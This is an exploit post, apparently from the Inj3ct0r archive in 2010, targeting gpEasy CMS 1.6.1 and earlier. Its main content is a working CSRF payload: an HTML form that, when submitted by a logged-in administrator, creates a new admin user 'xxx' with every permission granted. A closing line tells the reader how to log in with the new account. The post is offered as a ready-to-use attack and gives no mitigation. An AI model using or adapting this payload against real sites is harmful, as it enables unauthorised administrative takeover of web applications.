gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
Posted on 29 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit ============================================= Author : Giuseppe 'giudinvx' D'Inverno Email : <giudinvx[at]gmail[dot]com> Date : 04-29-2010 Site : http://www.giudinvx.altervista.org/ Location : Naples, Italy -------------------------------------------------------- Application Info Site : http://www.gpeasy.com/ Version: 1.6.1 -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <html> <form method="post" action="[patth]/index.php/Admin_Users"> <input type="text" value="xxx" name="username"><br/> <input type="password" value="xxx" name="password"><br/> <input type="password" value="xxx" name="password1"><br/> <input type="text" value="xxx" name="email"><br/> <input value="Admin_Menu" type="hidden" name="grant[]"> <input value="Admin_Uploaded" type="hidden" name="grant[]"> <input value="Admin_Extra" type="hidden" name="grant[]"> <input value="Admin_Theme" type="hidden" name="grant[]"> <input value="Admin_Users" type="hidden" name="grant[]"> <input value="Admin_Configuration" type="hidden" name="grant[]"> <input value="Admin_Trash" type="hidden" name="grant[]"> <input value="Admin_Uninstall" type="hidden" name="grant[]"> <input value="Admin_Addons" type="hidden" name="grant[]"> <input value="Admin_New" type="hidden" name="grant[]"> <input value="Admin_Theme_Content" type="hidden" name="grant[]"> <input type="hidden" value="newuser" name="cmd"> <input type="submit" value="Continue" name="aaa" class="submit"> </form> </html> # Now you have an Admin user with name: xxx and password: xxx, just login page [path]/index.php/Admin # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>